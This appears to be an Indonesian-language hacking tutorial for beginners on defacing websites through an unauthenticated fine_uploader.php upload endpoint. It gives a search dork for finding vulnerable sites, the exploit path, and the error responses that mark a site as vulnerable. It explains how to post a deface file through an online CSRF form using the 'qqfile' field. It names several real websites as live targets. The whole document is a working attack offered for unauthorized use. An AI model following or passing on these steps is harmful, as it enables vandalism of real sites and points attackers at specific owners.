Assalamualaikum Brother
Oke Bro Kali Ini Gwe Akan Kasih Cara Deface Metode Uploaded With CSRF Online Cocok buat pemula karna ini easy deface..
Oke langsung di gas ae..
NOTE :
Di Poc deface ini kamu hanya bisa upload file txt,jpg,dan png saja.. tidak bisa html atapun php jadi ga bisa up shell,, tapi gapapa
Dork :
inurl:/fine_uploader.php
Xploit :
/fine_uploader.php
Pertama kamu dorking dulu cari target..
jika sudah dapat target kamu masukin xploitnya di belakang web
Contoh :
https://www.destockplus.es/fine_uploader.php (Target Vuln)
Jika tampilan web nya berubah jadi seperti ini itu tandanya vuln
{"error":"No files were uploaded.","uploadName":null,"html":"<div class=\"uploader\"><\/div>\n"}Atau seperti ini(Sama-sama Vuln)<br /><b>Notice</b>: Undefined offset: 0 in <b>/home/optifund/domains/optifunding.com/public_html/fine_uploader.php</b> on line <b>29</b><br />{"error":"No files were uploaded.","uploadName":null,"html":"\n<div class=\"uploader\"><\/div>\n"}
Kamu tingal salin link nya aja,, lalu pergi ke CSRF Online
Di Csrf Masukkan Website Yang Vuln tadi,Di File Datanya Isi "qqfile" seperti gambar di bawah ini
Lalu kamu lock target setelah itu upload file kamu
jika sudah upload saja file deface kamu.. lalu tingal akses..
Cara Aksesnya?
Setelah Kalian Submit Maka Akan Keluar Website Aksesnya
http://www.optiproduct.com/cache/fileyangkamusalin.txt
Hasil Gwe :
Live Target (Kalau eror dorking sendiri)
http://myled.nc/
http://www.optiproduct.com/
https://www.destockplus.es/
https://bosspoint.xyz/
Sekian tutorial nya bro semoga bermanfaat dan jangan lupa share..
Terimakasih